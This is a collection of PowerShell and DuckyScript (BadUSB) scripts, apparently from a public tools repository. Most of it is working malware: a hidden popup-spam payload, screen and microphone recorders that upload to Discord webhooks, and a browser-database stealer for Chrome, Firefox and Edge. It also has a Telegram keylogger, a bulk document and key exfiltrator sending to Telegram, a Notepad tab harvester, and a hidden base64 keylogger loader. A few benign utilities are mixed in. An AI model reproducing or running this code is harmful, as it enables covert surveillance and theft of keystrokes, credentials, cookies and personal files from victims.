4 | REM Target: Windows 10,11 5 | 6 | DEFAULT_DELAY 100 7 | 8 | REM open powershell (remove -W Hidden to show the window) 9 | GUI r 10 | DELAY 750 11 | STRING powershell -NoP -NonI -Exec Bypass 12 | ENTER 13 | DELAY 5000 14 | 15 | STRING $Import = '[DllImport("user32.dll")] public static extern bool ShowWindow(int handle, int state);';add-type -name win -member $Import -namespace native;[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0);Add-Type -AssemblyName System.Windows.Forms;function Create-Form {$form = New-Object Windows.Forms.Form;$form.Text = " __--** YOU HAVE BEEN INFECTED BY HYDRA **--__ ";$form.Font = 'Microsoft Sans Serif,12,style=Bold';$form.Size = New-Object Drawing.Size(300, 170);$form.StartPosition = 'Manual';$form.BackColor = [System.Drawing.Color]::Black;$form.FormBorderStyle = [System.Windows.Forms.FormBorderStyle]::FixedDialog;$form.ControlBox = $false;$form.Font = 'Microsoft Sans Serif,12,style=bold';$form.ForeColor = "#FF0000";$Text = New-Object Windows.Forms.Label;$Text.Text = "Cut The Head Off The Snake..`n`n ..Two More Will Appear";$Text.Font = 'Microsoft Sans Serif,14';$Text.AutoSize = $true;$Text.Location = New-Object System.Drawing.Point(15, 20);$Close = New-Object Windows.Forms.Button;$Close.Text = "Close?";$Close.Width = 120;$Close.Height = 35;$Close.BackColor = [System.Drawing.Color]::White;$Close.ForeColor = [System.Drawing.Color]::Black;$Close.DialogResult = [System.Windows.Forms.DialogResult]::OK;$Close.Location = New-Object System.Drawing.Point(85, 100);$Close.Font = 'Microsoft Sans Serif,12,style=Bold';$form.Controls.AddRange(@($Text, $Close));return $form};while($true){$form = Create-Form;$form.StartPosition = 'Manual';$form.Location = New-Object System.Drawing.Point((Get-Random -Minimum 0 -Maximum 1000), (Get-Random -Minimum 0 -Maximum 1000));$result = $form.ShowDialog();if ($result -eq [System.Windows.Forms.DialogResult]::OK) {$form2 = 
Create-Form;$form2.StartPosition = 'Manual';$form2.Location = New-Object System.Drawing.Point((Get-Random -Minimum 0 -Maximum 1000), (Get-Random -Minimum 0 -Maximum 1000));$form2.Show()}$random = (Get-Random -Minimum 0 -Maximum 2);Sleep $random} 16 | ENTER 17 | -------------------------------------------------------------------------------- /Record-Screen-to-Discord/main.ps1: -------------------------------------------------------------------------------- 1 | <#==================== RECORD SCREEN TO DISCORD ========================= 2 | 3 | SYNOPSIS 4 | This script records the screen for a specified time to a mkv file, then sends the file to a discord webhook. 5 | 6 | #> 7 | 8 | $hookurl = "$dc" 9 | if ($hookurl.Ln -lt 120){$hookurl = (irm $hookurl).url} 10 | 11 | while($true){ 12 | 13 | Function RecordScreen{ 14 | param ([int[]]$t) 15 | if ($t.Length -eq 0){$t = 10} 16 | $Path = "$env:Temp\ffmpeg.exe" 17 | If (!(Test-Path $Path)){ 18 | $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = ":hourglass: ``Downloading ffmpeg.exe. 
Please wait...`` :hourglass:"} | ConvertTo-Json 19 | Invoke-RestMethod -Uri $hookurl -Method Post -ContentType "application/json" -Body $jsonsys 20 | $tempDir = "$env:temp" 21 | $apiUrl = "https://api.github.com/repos/GyanD/codexffmpeg/releases/latest" 22 | $response = Invoke-WebRequest -Uri $apiUrl -Headers @{ "User-Agent" = "PowerShell" } -UseBasicParsing 23 | $release = $response.Content | ConvertFrom-Json 24 | $asset = $release.assets | Where-Object { $_.name -like "*essentials_build.zip" } 25 | $zipUrl = $asset.browser_download_url 26 | $zipFilePath = Join-Path $tempDir $asset.name 27 | $extractedDir = Join-Path $tempDir ($asset.name -replace '.zip$', '') 28 | Invoke-WebRequest -Uri $zipUrl -OutFile $zipFilePath 29 | Expand-Archive -Path $zipFilePath -DestinationPath $tempDir -Force 30 | Move-Item -Path (Join-Path $extractedDir 'bin\ffmpeg.exe') -Destination $tempDir -Force 31 | Remove-Item -Path $zipFilePath -Force 32 | Remove-Item -Path $extractedDir -Recurse -Force 33 | } 34 | $mkvPath = "$env:Temp\ScreenClip.mp4" 35 | $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = ":arrows_counterclockwise: ``Recording screen (24mb Clip)`` :arrows_counterclockwise:"} | ConvertTo-Json 36 | Invoke-RestMethod -Uri $hookurl -Method Post -ContentType "application/json" -Body $jsonsys 37 | .$env:Temp\ffmpeg.exe -f gdigrab -framerate 20 -t 20 -i desktop -vcodec libx264 -preset fast -crf 18 -pix_fmt yuv420p -movflags +faststart $mkvPath 38 | # .$env:Temp\ffmpeg.exe -f gdigrab -framerate 5 -i desktop -fs 24000000 $mkvPath 39 | curl.exe -F file1=@"$mkvPath" $hookurl | Out-Null 40 | sleep 1 41 | rm -Path $mkvPath -Force 42 | } 43 | 44 | RecordScreen 45 | 46 | } 47 | -------------------------------------------------------------------------------- /Mouse-Monitor-to-Discord/main.ps1: -------------------------------------------------------------------------------- 1 | $whuri = "$dc" 2 | 3 | $signature = @' 4 | [DllImport("user32.dll")] 5 | [return: 
MarshalAs(UnmanagedType.Bool)] 6 | public static extern bool GetCursorPos(out POINT lpPoint); 7 | [StructLayout(LayoutKind.Sequential)] 8 | public struct POINT 9 | { 10 | public int X; 11 | public int Y; 12 | } 13 | '@ 14 | 15 | $timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss" 16 | $outpath = "$env:temp\info.txt" 17 | $cursorType = Add-Type -MemberDefinition $signature -Name "CursorPos" -Namespace "Win32" -PassThru 18 | $prevX = 0 19 | $idleThreshold = New-TimeSpan -Seconds 60 20 | $lastActivityTime = [System.DateTime]::Now 21 | $isActive = $true 22 | $iActive = $true 23 | sleep 1 24 | 25 | while ($true) { 26 | $cursorPos = New-Object Win32.CursorPos+POINT 27 | [Win32.CursorPos]::GetCursorPos([ref]$cursorPos) | Out-Null 28 | $currentX = $cursorPos.X 29 | $currentTime = [System.DateTime]::Now 30 | 31 | if ($currentX -ne $prevX) { 32 | if ($iActive) { 33 | $prevX = $currentX 34 | $lastActivityTime = $currentTime 35 | 36 | if ($idleTime -lt $idleThreshold) { 37 | $msgsys = "[$timestamp] : Mouse is active" 38 | $escmsgsys = $msgsys -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')} 39 | $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsgsys} | ConvertTo-Json 40 | Invoke-RestMethod -Uri $whuri -Method Post -ContentType "application/json" -Body $jsonsys 41 | } 42 | $iActive = $false 43 | } 44 | } 45 | else { 46 | $iActive = $true 47 | } 48 | 49 | 50 | $idleTime = $currentTime - $lastActivityTime 51 | 52 | if ($idleTime -ge $idleThreshold) { 53 | if ($isActive) { 54 | $msgsys = "[$timestamp] : Mouse has been inactive for 60 seconds" 55 | $escmsgsys = $msgsys -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')} 56 | $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsgsys} | ConvertTo-Json 57 | Invoke-RestMethod -Uri $whuri -Method Post -ContentType "application/json" -Body $jsonsys 58 | $isActive = $false 59 | $iActive = $true 60 | } 61 | else { 62 | } 63 | } 64 | else 
{ 65 | $isActive = $true 66 | } 67 | Start-Sleep -Milliseconds 60 68 | } 69 | 70 | -------------------------------------------------------------------------------- /Chrome-DB-to-Discord/main.ps1: -------------------------------------------------------------------------------- 1 | 2 | $dc = "$dc" 3 | $temp = [System.IO.Path]::GetTempPath() 4 | $tempFolder = Join-Path -Path $temp -ChildPath 'dbfiles' 5 | $googledest = Join-Path -Path $tempFolder -ChildPath 'google' 6 | $mozdest = Join-Path -Path $tempFolder -ChildPath 'firefox' 7 | $edgedest = Join-Path -Path $tempFolder -ChildPath 'edge' 8 | New-Item -Path $tempFolder -ItemType Directory -Force 9 | sleep 1 10 | New-Item -Path $googledest -ItemType Directory -Force 11 | New-Item -Path $mozdest -ItemType Directory -Force 12 | New-Item -Path $edgedest -ItemType Directory -Force 13 | 14 | sleep 1 15 | 16 | Function CopyFiles { 17 | 18 | param ([string]$dbfile,[string]$folder,[switch]$db) 19 | 20 | Write-Host "Input : $dbfile Selected" 21 | Write-Host "Folder : $folder Selected" 22 | 23 | $filesToCopy = Get-ChildItem -Path $dbfile -Filter '*' -Recurse | Where-Object { $_.Name -like 'Web Data' -or $_.Name -like 'History' -or $_.Name -like 'formhistory.sqlite' -or $_.Name -like 'places.sqlite' -or $_.Name -like 'cookies.sqlite'} 24 | 25 | foreach ($file in $filesToCopy) { 26 | 27 | Write-Host $file 28 | $randomLetters = -join ((65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_}) 29 | if ($db -eq $true){ 30 | $newFileName = $file.BaseName + "_" + $randomLetters + $file.Extension + '.db' 31 | } 32 | else{ 33 | $newFileName = $file.BaseName + "_" + $randomLetters + $file.Extension 34 | } 35 | $destination = Join-Path -Path $folder -ChildPath $newFileName 36 | Copy-Item -Path $file.FullName -Destination $destination -Force 37 | } 38 | 39 | } 40 | 41 | $script:googleDir = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data" 42 | $script:firefoxDir = Get-ChildItem -Path 
"$Env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles" -Directory | Where-Object { $_.Name -like '*.default-release' };$firefoxDir = $firefoxDir.FullName 43 | $script:edgeDir = "$Env:USERPROFILE\AppData\Local\Microsoft\Edge\User Data" 44 | 45 | copyFiles -dbfile $googleDir -folder $googledest -db 46 | copyFiles -dbfile $firefoxDir -folder $mozdest 47 | copyFiles -dbfile $edgeDir -folder $edgedest -db 48 | 49 | $zipFileName = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), "dbfiles.zip") 50 | Compress-Archive -Path $tempFolder -DestinationPath $zipFileName 51 | 52 | Remove-Item -Path $tempFolder -Recurse -Force 53 | 54 | curl.exe -F file1=@"$zipFileName" $dc | Out-Null 55 | sleep 1 56 | Remove-Item -Path $zipFileName -Recurse -Force 57 | -------------------------------------------------------------------------------- /Record-Mic-to-Discord/main.ps1: -------------------------------------------------------------------------------- 1 | <#==================== RECORD MICROPHONE TO DISCORD ========================= 2 | 3 | SYNOPSIS 4 | This script finds the default microphone and records for a specified time to a mp3 file, then sends the file to a discord webhook. 
5 | 6 | #> 7 | $hookurl = "$dc" 8 | if ($hookurl.Ln -lt 120){$hookurl = (irm $hookurl).url} 9 | 10 | Function RecordAudio{ 11 | param ([int[]]$t) 12 | 13 | $Path = "$env:Temp\ffmpeg.exe" 14 | 15 | If (!(Test-Path $Path)){ 16 | $tempDir = "$env:temp" 17 | $apiUrl = "https://api.github.com/repos/GyanD/codexffmpeg/releases/latest" 18 | $response = Invoke-WebRequest -Uri $apiUrl -Headers @{ "User-Agent" = "PowerShell" } -UseBasicParsing 19 | $release = $response.Content | ConvertFrom-Json 20 | $asset = $release.assets | Where-Object { $_.name -like "*essentials_build.zip" } 21 | $zipUrl = $asset.browser_download_url 22 | $zipFilePath = Join-Path $tempDir $asset.name 23 | $extractedDir = Join-Path $tempDir ($asset.name -replace '.zip$', '') 24 | Invoke-WebRequest -Uri $zipUrl -OutFile $zipFilePath 25 | Expand-Archive -Path $zipFilePath -DestinationPath $tempDir -Force 26 | Move-Item -Path (Join-Path $extractedDir 'bin\ffmpeg.exe') -Destination $tempDir -Force 27 | Remove-Item -Path $zipFilePath -Force 28 | Remove-Item -Path $extractedDir -Recurse -Force 29 | Write-Output "FFmpeg has been downloaded and extracted to $tempDir" 30 | } 31 | 32 | sleep 1 33 | 34 | Add-Type '[Guid("D666063F-1587-4E43-81F1-B948E807363F"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]interface IMMDevice {int a(); int o();int GetId([MarshalAs(UnmanagedType.LPWStr)] out string id);}[Guid("A95664D2-9614-4F35-A746-DE8DB63617E6"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]interface IMMDeviceEnumerator {int f();int GetDefaultAudioEndpoint(int dataFlow, int role, out IMMDevice endpoint);}[ComImport, Guid("BCDE0395-E52F-467C-8E3D-C4579291692E")] class MMDeviceEnumeratorComObject { }public static string GetDefault (int direction) {var enumerator = new MMDeviceEnumeratorComObject() as IMMDeviceEnumerator;IMMDevice dev = null;Marshal.ThrowExceptionForHR(enumerator.GetDefaultAudioEndpoint(direction, 1, out dev));string id = null;Marshal.ThrowExceptionForHR(dev.GetId(out id));return id;}' 
-name audio -Namespace system 35 | function getFriendlyName($id) {$reg = "HKLM:\SYSTEM\CurrentControlSet\Enum\SWD\MMDEVAPI\$id";return (get-ItemProperty $reg).FriendlyName} 36 | $id1 = [audio]::GetDefault(1);$MicName = "$(getFriendlyName $id1)"; Write-Output $MicName 37 | 38 | $mp3Path = "$env:Temp\AudioClip.mp3" 39 | 40 | if ($t.Length -eq 0){$t = 10} 41 | 42 | .$env:Temp\ffmpeg.exe -f dshow -i audio="$MicName" -t $t -c:a libmp3lame -ar 44100 -b:a 128k -ac 1 $mp3Path 43 | 44 | curl.exe -F file1=@"$mp3Path" $hookurl | Out-Null 45 | sleep 1 46 | rm -Path $mp3Path -Force 47 | 48 | } 49 | 50 | RecordAudio -t 120 # time to record microphone in seconds 51 | -------------------------------------------------------------------------------- /Filetype-Organizer/main.ps1: -------------------------------------------------------------------------------- 1 | 2 | $Host.UI.RawUI.BackgroundColor = "Black" 3 | Clear-Host 4 | $width = 88 5 | $height = 30 6 | [Console]::SetWindowSize($width, $height) 7 | $windowTitle = " BeigeTools | Filetype Organizer" 8 | [Console]::Title = $windowTitle 9 | Write-Host "=======================================================================================" -ForegroundColor Green 10 | Write-Host "============================= BeigeTools | Filetype Organizer =================================" -ForegroundColor Green 11 | Write-Host "=======================================================================================`n" -ForegroundColor Green 12 | Write-Host "More info at : https://github.com/beigeworm" -ForegroundColor DarkGray 13 | Write-Host "Starts a GUI window to select a folder, then search for every file with a selected filetype and output to respective named files in the root folder.`n" 14 | 15 | # Get the directory of the script 16 | $scriptDirectory = Split-Path -Parent $MyInvocation.MyCommand.Definition 17 | 18 | # Prompt user for file extensions 19 | $fileExtensions = Read-Host "Enter file extensions separated by commas (e.g., 
jpg,mp4,png)"

# Convert the input into an array
$fileExtensionsArray = $fileExtensions -split ','

# Prompt user for folder to search recursively
$folderPath = Read-Host "Enter the folder path to search recursively"

# Prompt user to choose between move or copy
$operation = Read-Host "Enter 'M' to move files, 'C' to copy files"

# Validate the user input for the operation
if ($operation -ne 'M' -and $operation -ne 'C') {
    Write-Host "Invalid operation. Please enter 'M' for move or 'C' for copy."
    exit
}

# Create output folders in the script directory
foreach ($extension in $fileExtensionsArray) {
    $folderName = $extension.Trim()
    $folderPathForExtension = Join-Path $scriptDirectory $folderName
    New-Item -ItemType Directory -Path $folderPathForExtension -Force
}

# Search for files and move/copy to appropriate folders
foreach ($extension in $fileExtensionsArray) {
    # Trim the extension so input such as "jpg, mp4" still matches "*.mp4"
    $files = Get-ChildItem -Path $folderPath -Recurse -Include "*.$($extension.Trim())"

    foreach ($file in $files) {
        $destinationFolder = Join-Path $scriptDirectory $extension.Trim()

        if ($operation -eq 'M') {
            $ind = $file.FullName
            Move-Item $file.FullName -Destination $destinationFolder -Force
            Write-Host "Moved : $ind"

        } elseif ($operation -eq 'C') {
            $ind = $file.FullName
            Copy-Item $file.FullName -Destination $destinationFolder -Force
            Write-Host "Copied : $ind"
        }
    }
}

Write-Host "Operation Complete."
-ForegroundColor Green 64 | pause -------------------------------------------------------------------------------- /Telegram-Keylogger/main.ps1: -------------------------------------------------------------------------------- 1 | $Token = "$tg" 2 | $PassPhrase = "$env:COMPUTERNAME" 3 | $URL='https://api.telegram.org/bot{0}' -f $Token 4 | while($chatID.length -eq 0){ 5 | $updates = Invoke-RestMethod -Uri ($url + "/getUpdates") 6 | if ($updates.ok -eq $true) {$latestUpdate = $updates.result[-1] 7 | if ($latestUpdate.message -ne $null){$chatID = $latestUpdate.message.chat.id}} 8 | Sleep 10 9 | } 10 | 11 | Function KeyCapture { 12 | $MessageToSend = New-Object psobject 13 | $MessageToSend | Add-Member -MemberType NoteProperty -Name 'chat_id' -Value $ChatID 14 | $MessageToSend | Add-Member -MemberType NoteProperty -Name 'text' -Value "$env:COMPUTERNAME : KeyCapture Started." -Force 15 | irm -Method Post -Uri ($URL +'/sendMessage') -Body ($MessageToSend | ConvertTo-Json) -ContentType "application/json" 16 | $API = '[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] public static extern short GetAsyncKeyState(int virtualKeyCode); [DllImport("user32.dll", CharSet=CharSet.Auto)]public static extern int GetKeyboardState(byte[] keystate);[DllImport("user32.dll", CharSet=CharSet.Auto)]public static extern int MapVirtualKey(uint uCode, int uMapType);[DllImport("user32.dll", CharSet=CharSet.Auto)]public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);' 17 | $API = Add-Type -MemberDefinition $API -Name 'Win32' -Namespace API -PassThru 18 | $LastKeypressTime = [System.Diagnostics.Stopwatch]::StartNew() 19 | $KeypressThreshold = [TimeSpan]::FromSeconds(10) 20 | While ($true){ 21 | $keyPressed = $false 22 | try{ 23 | while ($LastKeypressTime.Elapsed -lt $KeypressThreshold) { 24 | Start-Sleep -Milliseconds 30 25 | for ($asc = 8; $asc -le 254; $asc++){ 26 | $keyst = 
$API::GetAsyncKeyState($asc) 27 | if ($keyst -eq -32767) { 28 | $keyPressed = $true 29 | $LastKeypressTime.Restart() 30 | $null = [console]::CapsLock 31 | $vtkey = $API::MapVirtualKey($asc, 3) 32 | $kbst = New-Object Byte[] 256 33 | $checkkbst = $API::GetKeyboardState($kbst) 34 | $logchar = New-Object -TypeName System.Text.StringBuilder 35 | if ($API::ToUnicode($asc, $vtkey, $kbst, $logchar, $logchar.Capacity, 0)) { 36 | $LString = $logchar.ToString() 37 | if ($asc -eq 8) {$LString = "[BKSP]"} 38 | if ($asc -eq 13) {$LString = "[ENT]"} 39 | if ($asc -eq 27) {$LString = "[ESC]"} 40 | $nosave += $LString 41 | }}}}} 42 | finally{ 43 | If ($keyPressed) { 44 | $escmsgsys = $nosave -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')} 45 | $timestamp = Get-Date -Format "dd-MM-yyyy HH:mm:ss" 46 | $escmsg = "Keys Captured : "+$escmsgsys 47 | $MessageToSend | Add-Member -MemberType NoteProperty -Name 'text' -Value "$escmsg" -Force 48 | irm -Method Post -Uri ($URL +'/sendMessage') -Body ($MessageToSend | ConvertTo-Json) -ContentType "application/json" 49 | $keyPressed = $false 50 | $nosave = "" 51 | } 52 | } 53 | $LastKeypressTime.Restart() 54 | Start-Sleep -Milliseconds 10 55 | } 56 | } 57 | -------------------------------------------------------------------------------- /Image-to-Console/main.ps1: -------------------------------------------------------------------------------- 1 | <#==================== Image to Powershell Console =============================== 2 | 3 | SYNOPSIS 4 | Convert an image to Powershell console. 5 | 6 | CREDIT 7 | All credit and kudos to I-Am-Jakoby on Github for this script. 
#>

[Console]::BackgroundColor = "Black"
[Console]::CursorVisible = $false
$wshell = New-Object -ComObject wscript.shell;
$wshell.AppActivate("Powershell.exe")
$wshell.SendKeys("{F11}")
cls
$fpath = "$env:temp/img.png"
iwr -uri https://i.imgur.com/gUkR5qp.png -O $fpath

Function PS-Draw{
    param([String] [parameter(mandatory=$true, Valuefrompipeline = $true)] $Path,[Switch] $ToASCII)
    Begin{
        [void] [System.Reflection.Assembly]::LoadWithPartialName('System.drawing')
        $Colors = @{
            'FF000000' = 'White'
            'FFFFFFFF' = 'Black'
            'FF000080' = 'DarkBlue'
            'FF008000' = 'DarkGreen'
            'FF008080' = 'DarkCyan'
            'FF800000' = 'DarkRed'
            'FF800080' = 'DarkMagenta'
            'FF808000' = 'DarkYellow'
            'FFC0C0C0' = 'Gray'
            'FF808080' = 'DarkGray'
            'FF0000FF' = 'Blue'
            'FF00FF00' = 'Green'
            'FF00FFFF' = 'Cyan'
            'FFFF0000' = 'Red'
            'FFFF00FF' = 'Magenta'
            'FFFFFF00' = 'Yellow'
        }
        Function Get-ClosestConsoleColor($PixelColor){
            ($(foreach ($item in $Colors.Keys) {
                [pscustomobject]@{
                    'Color' = $Item
                    'Diff' = [math]::abs([convert]::ToInt32($Item,16) - [convert]::ToInt32($PixelColor,16))
                }
            }) | Sort-Object Diff)[0].color
        }
    }
    Process
    {
        Foreach($item in $Path){
            $BitMap = [System.Drawing.Bitmap]::FromFile((Get-Item $Item).fullname)
            Foreach($y in (1..($BitMap.Height-1)))
            {
                Foreach($x in (1..($BitMap.Width-1))){
                    $Pixel = $BitMap.GetPixel($X,$Y)
                    $BackGround = $Colors.Item((Get-ClosestConsoleColor $Pixel.name))
                    If($ToASCII){
                        Write-Host "$([Char](Get-Random -Maximum 126 -Minimum 33))" -NoNewline -ForegroundColor $BackGround
                    }
                    else{
                        Write-Host " " -NoNewline -BackgroundColor $BackGround
                    }
                }
                Write-Host ''
            }
        }
    }
    end{}
}


Add-Type -AssemblyName System.Windows.Forms

$fpath | PS-Draw -ToASCII
| 79 | sleep 5 80 | 81 | $o=New-Object -ComObject WScript.Shell 82 | $i = 0 83 | while ($i -lt 12){ 84 | $o.SendKeys("^+-") 85 | $i++ 86 | sleep -Milliseconds 200 87 | } 88 | -------------------------------------------------------------------------------- /Exfiltrate-to-Telegram/main.ps1: -------------------------------------------------------------------------------- 1 | $Token = "$tg" 2 | $URL='https://api.telegram.org/bot{0}' -f $Token 3 | 4 | while($chatID.length -eq 0){ 5 | $updates = Invoke-RestMethod -Uri ($url + "/getUpdates") 6 | if ($updates.ok -eq $true) {$latestUpdate = $updates.result[-1] 7 | if ($latestUpdate.message -ne $null){$chatID = $latestUpdate.message.chat.id}} 8 | Sleep 10 9 | } 10 | 11 | Function Exfiltrate { 12 | 13 | param ([string[]]$FileType,[string[]]$Path) 14 | $maxZipFileSize = 50MB 15 | $currentZipSize = 0 16 | $index = 1 17 | $zipFilePath ="$env:temp/Loot$index.zip" 18 | $MessageToSend = New-Object psobject 19 | $MessageToSend | Add-Member -MemberType NoteProperty -Name 'chat_id' -Value $ChatID 20 | $MessageToSend | Add-Member -MemberType NoteProperty -Name 'text' -Value "$env:COMPUTERNAME : Exfiltration Started." 
-Force 21 | irm -Method Post -Uri ($URL +'/sendMessage') -Body ($MessageToSend | ConvertTo-Json) -ContentType "application/json" 22 | 23 | If($Path -ne $null){ 24 | $foldersToSearch = "$env:USERPROFILE\"+$Path 25 | }else{ 26 | $foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos") 27 | } 28 | 29 | If($FileType -ne $null){ 30 | $fileExtensions = "*."+$FileType 31 | }else { 32 | $fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft") 33 | } 34 | 35 | Add-Type -AssemblyName System.IO.Compression.FileSystem 36 | $zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create') 37 | $escmsg = "Files from : "+$env:COMPUTERNAME 38 | 39 | foreach ($folder in $foldersToSearch) { 40 | foreach ($extension in $fileExtensions) { 41 | $files = Get-ChildItem -Path $folder -Filter $extension -File -Recurse 42 | foreach ($file in $files) { 43 | $fileSize = $file.Length 44 | if ($currentZipSize + $fileSize -gt $maxZipFileSize) { 45 | $zipArchive.Dispose() 46 | $currentZipSize = 0 47 | curl.exe -F chat_id="$ChatID" -F document=@"$zipFilePath" "https://api.telegram.org/bot$Token/sendDocument" 48 | Remove-Item -Path $zipFilePath -Force 49 | Sleep 1 50 | $index++ 51 | $zipFilePath ="$env:temp/Loot$index.zip" 52 | $zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create') 53 | } 54 | $entryName = $file.FullName.Substring($folder.Length + 1) 55 | [System.IO.Compression.ZipFileExtensions]::CreateEntryFromFile($zipArchive, $file.FullName, $entryName) 56 | $currentZipSize += $fileSize 57 | } 58 | } 59 | } 60 | $zipArchive.Dispose() 61 | curl.exe -F chat_id="$ChatID" -F document=@"$zipFilePath" "https://api.telegram.org/bot$Token/sendDocument" 62 | Remove-Item -Path $zipFilePath -Force 63 | Write-Output 
"$env:COMPUTERNAME : Exfiltration Complete." 64 | } 65 | 66 | 67 | # Define What you want to search for (examples at the top) 68 | Exfiltrate 69 | -------------------------------------------------------------------------------- /Unsaved-Notepad-to-Discord/main.ps1: -------------------------------------------------------------------------------- 1 | <#========================== Notepad Tab Contents to Discord =============================== 2 | 3 | SYNOPSIS 4 | In Windows 11 notepad stores unsaved tabs for reopening notepad.... very unsafe. 5 | This is a script to find any unsaved notes in notepad and send them to a discord webhook. 6 | 7 | USAGE 8 | 1. Uncomment and Change YOUR_WEBHOOK_HERE to your own webhook 9 | 2. run the script on a target system. 10 | 3. Check Discord for results 11 | 12 | #> 13 | 14 | # $dc = 'YOUR_WEBHOOK_HERE' 15 | 16 | $hookurl = "$dc" 17 | 18 | $outpath = "$env:TMP\notepad.txt" 19 | 20 | $appDataDir = [Environment]::GetFolderPath('LocalApplicationData') 21 | $directoryRelative = "Packages\Microsoft.WindowsNotepad_*\LocalState\TabState" 22 | $matchingDirectories = Get-ChildItem -Path (Join-Path -Path $appDataDir -ChildPath 'Packages') -Filter 'Microsoft.WindowsNotepad_*' -Directory 23 | 24 | foreach ($dir in $matchingDirectories) { 25 | $fullPath = Join-Path -Path $dir.FullName -ChildPath 'LocalState\TabState' 26 | $listOfBinFiles = Get-ChildItem -Path $fullPath -Filter *.bin 27 | foreach ($fullFilePath in $listOfBinFiles) { 28 | if ($fullFilePath.Name -like '*.0.bin' -or $fullFilePath.Name -like '*.1.bin') { 29 | continue 30 | } 31 | 32 | $seperator = ("=" * 60) 33 | $SMseperator = ("-" * 60) 34 | $seperator | Out-File -FilePath $outpath -Append 35 | $filename = $fullFilePath.Name 36 | $contents = [System.IO.File]::ReadAllBytes($fullFilePath.FullName) 37 | $isSavedFile = $contents[3] 38 | 39 | if ($isSavedFile -eq 1) { 40 | $lengthOfFilename = $contents[4] 41 | $filenameEnding = 5 + $lengthOfFilename * 2 42 | $originalFilename = 
[System.Text.Encoding]::Unicode.GetString($contents[5..($filenameEnding - 1)]) 43 | "Found saved file : $originalFilename" | Out-File -FilePath $outpath -Append 44 | $filename | Out-File -FilePath $outpath -Append 45 | $SMseperator | Out-File -FilePath $outpath -Append 46 | Get-Content -Path $originalFilename -Raw | Out-File -FilePath $outpath -Append 47 | 48 | 49 | } else { 50 | "Found an unsaved tab!" | Out-File -FilePath $outpath -Append 51 | $filename | Out-File -FilePath $outpath -Append 52 | $SMseperator | Out-File -FilePath $outpath -Append 53 | $filenameEnding = 0 54 | $delimeterStart = [array]::IndexOf($contents, 0, $filenameEnding) 55 | $delimeterEnd = [array]::IndexOf($contents, 1, $filenameEnding) 56 | 57 | $fileMarker = $contents[($delimeterStart + 2)..($delimeterEnd - 1)] 58 | $fileMarker = -join ($fileMarker | ForEach-Object { [char]$_ }) 59 | 60 | $originalFileContents = [System.Text.Encoding]::Unicode.GetString($contents[($delimeterEnd + 4 + $fileMarker.Length)..($contents.Length - 6)]) 61 | $originalFileContents | Out-File -FilePath $outpath -Append 62 | } 63 | "`n" | Out-File -FilePath $outpath -Append 64 | } 65 | } 66 | 67 | curl.exe -F file1=@"$outpath" $hookurl 68 | Sleep 2 69 | Remove-Item -Path $outpath -force -------------------------------------------------------------------------------- /OSINT/Keylogger from base64 to Discord.txt: -------------------------------------------------------------------------------- 1 | REM Title: Keylogger from base64 to Discord 2 | REM Author: @beigeworm 3 | REM Description: Uses Powershell to gather keystroke info and send it via Discord. 4 | REM Target: Windows 10 5 | REM LEARN MORE HERE - https://github.com/beigeworm/Powershell-Tools-and-Toys 6 | 7 | REM *SETUP* 8 | REM replace WEBHOOK_GOES_HERE with your discord webhook. 9 | 10 | 11 | REM some setup for dukie script 12 | DEFAULT_DELAY 100 13 | 14 | REM Open Powershell and start logs. 
15 | DELAY 1000 16 | GUI r 17 | DELAY 500 18 | STRING powershell -NoP -NonI -Exec Bypass 19 | ENTER 20 | DELAY 5000 21 | 22 | STRING '$dc = "WEBHOOK_GOES_HERE!"' | Out-File -FilePath "$env:temp/a.ps1" -Force 23 | ENTER 24 | STRING $b64 = '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' 25 | ENTER 26 | STRING $decodedFile = [System.Convert]::FromBase64String($b64);$decodedText = [System.Text.Encoding]::UTF8.GetString($decodedFile);$decodedText | Out-File -FilePath "$env:temp/a.ps1" -Append 27 | ENTER 28 | STRING Start-Process PowerShell.exe -ArgumentList ("-NoP -Ep Bypass -w h -File `"$env:temp/a.ps1`"" -f $PSCommandPath);sleep 7;Remove-Item -Path $File -Force;exit 29 | ENTER 30 | -------------------------------------------------------------------------------- /Exfiltrate-to-USB/main.ps1: -------------------------------------------------------------------------------- 1 | [Console]::BackgroundColor = "Black" 2 | [Console]::SetWindowSize(57, 5) 3 | [Console]::Title = "Exfiltration" 4 | Clear-Host 5 | 6 | if($driveName.length -lt 1){ 7 | $driveName = Read-Host "Enter the name of the USB drive " 8 | } 9 | 10 | if($hidden.length -lt 1){ 11 | $hidden = Read-Host "Would you like to hide this console window? (Y/N) " 12 | } 13 | 14 | $i = 10 15 | 16 | While ($true){ 17 | cls 18 | Write-Host "Waiting for USB Drive.. ($i)" -ForegroundColor Yellow 19 | $drive = Get-WMIObject Win32_LogicalDisk | ? {$_.VolumeName -eq $driveName} | select DeviceID 20 | sleep 1 21 